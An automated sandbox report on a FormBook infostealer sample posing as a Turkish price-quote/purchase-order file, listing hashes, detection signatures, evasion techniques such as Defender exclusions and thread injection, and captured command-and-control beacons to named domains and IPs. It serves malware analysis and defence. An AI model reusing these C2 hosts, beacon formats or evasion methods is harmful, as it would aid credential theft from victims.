Windows Analysis Report
Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe

Overview

General Information

Sample name: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Analysis ID: 1466660
MD5: 7c9c6894ac6c53f5066c4e42a0e2121f
SHA1: 8f6ed8a129c9968be749912335313e0886eb93e8
SHA256: a8528698af2f0256467229c6e265bad403c57d941040cfd94678516769587394
Tags: exegeoTUR
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe ReversingLabs: Detection: 60%
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Virustotal: Detection: 60% Perma Link
Yara detected FormBook
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unregmp2.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: owYCvHvzfwuh.exe, 00000008.00000002.3778328626.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3778593047.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: unregmp2.pdbGCTL source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BDBE00 FindFirstFileW,FindNextFileW,FindClose, 9_2_00BDBE00
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 4x nop then xor eax, eax 9_2_00BC97B0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 4x nop then pop edi 9_2_00BCE09E
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 4x nop then mov ebx, 00000004h 9_2_0502053E

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49713 -> 23.111.180.146:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49714 -> 103.197.25.241:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49715 -> 103.197.25.241:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49718 -> 103.197.25.241:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49719 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49722 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49723 -> 212.227.172.254:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 212.227.172.254:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49726 -> 212.227.172.254:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49727 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49730 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49731 -> 109.95.158.122:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 109.95.158.122:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49734 -> 109.95.158.122:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49735 -> 203.161.49.220:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 203.161.49.220:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49738 -> 203.161.49.220:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49739 -> 35.227.248.111:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 35.227.248.111:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49742 -> 35.227.248.111:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49743 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49744 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49746 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49747 -> 47.239.13.172:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49748 -> 47.239.13.172:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49750 -> 47.239.13.172:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49751 -> 208.91.197.27:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49752 -> 208.91.197.27:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49754 -> 208.91.197.27:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49755 -> 66.235.200.146:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49756 -> 66.235.200.146:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49758 -> 66.235.200.146:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49759 -> 23.111.180.146:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49760 -> 103.197.25.241:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.evertudy.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 66.235.200.146 66.235.200.146
Source: Joe Sandbox View IP Address: 23.111.180.146 23.111.180.146
Source: Joe Sandbox View IP Address: 103.197.25.241 103.197.25.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View ASN Name: DHOSTING-ASWarsawPolandPL DHOSTING-ASWarsawPolandPL
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1Host: www.highwavesmarine.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g== HTTP/1.1Host: www.dennisrosenberg.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.ennerdaledevcons.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /9285/?hH=z4MROtYNL8tsqryqYVwhIRiC1K/sXlb0hIiORiEdpZxgXp9iqAKh/lqcbyO1AV4s7Ir6nuLseD1viLy4mDmuUoJvGkxfj7PnqEMVCvhqUXK8NAJvVg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.artemhypnotherapy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.mocar.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.evertudy.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.luo918.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.fungusbus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.qe1jqiste.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.thesprinklesontop.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.stefanogaus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1Host: www.highwavesmarine.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic DNS traffic detected: DNS query: www.highwavesmarine.com
Source: global traffic DNS traffic detected: DNS query: www.dxgsf.shop
Source: global traffic DNS traffic detected: DNS query: www.dennisrosenberg.studio
Source: global traffic DNS traffic detected: DNS query: www.shoplifestylebrand.com
Source: global traffic DNS traffic detected: DNS query: www.ennerdaledevcons.co.uk
Source: global traffic DNS traffic detected: DNS query: www.neworldelectronic.com
Source: global traffic DNS traffic detected: DNS query: www.artemhypnotherapy.com
Source: global traffic DNS traffic detected: DNS query: www.todosneaker.com
Source: global traffic DNS traffic detected: DNS query: www.mocar.pro
Source: global traffic DNS traffic detected: DNS query: www.evertudy.xyz
Source: global traffic DNS traffic detected: DNS query: www.luo918.com
Source: global traffic DNS traffic detected: DNS query: www.fungusbus.com
Source: global traffic DNS traffic detected: DNS query: www.newzionocala.com
Source: global traffic DNS traffic detected: DNS query: www.qe1jqiste.sbs
Source: global traffic DNS traffic detected: DNS query: www.thesprinklesontop.com
Source: global traffic DNS traffic detected: DNS query: www.stefanogaus.com
Source: unknown HTTP traffic detected: POST /vfca/ HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeCache-Control: max-age=0Content-Length: 191Content-Type: application/x-www-form-urlencodedOrigin: http://www.dxgsf.shopReferer: http://www.dxgsf.shop/vfca/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 52 4c 63 4d 50 54 47 42 7a 6e 54 31 69 78 6e 6e 37 54 56 41 72 49 46 41 4c 69 6e 66 56 53 52 71 79 45 72 41 67 5a 51 49 35 78 4e 30 52 46 53 77 52 70 4b 48 5a 2f 46 42 39 2f 42 49 48 6d 65 6a 72 58 30 77 4d 35 52 73 35 52 31 63 67 4e 37 70 72 71 74 69 7a 2b 6d 6b 62 74 54 50 75 4a 50 51 73 75 79 4a 67 30 34 52 34 78 43 50 35 62 4f 70 65 74 46 36 34 6b 37 47 72 42 47 33 6d 65 37 61 58 65 48 52 50 44 4e 77 59 73 48 33 39 6b 61 4c 6f 39 76 6a 36 51 6a 4b 42 45 6a 36 4c 66 48 78 54 76 4b 48 6a 4e 2f 42 6e 33 54 5a 53 2f 6e 38 Data Ascii: hH=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj6QjKBEj6LfHxTvKHjN/Bn3TZS/n8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:53:25 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
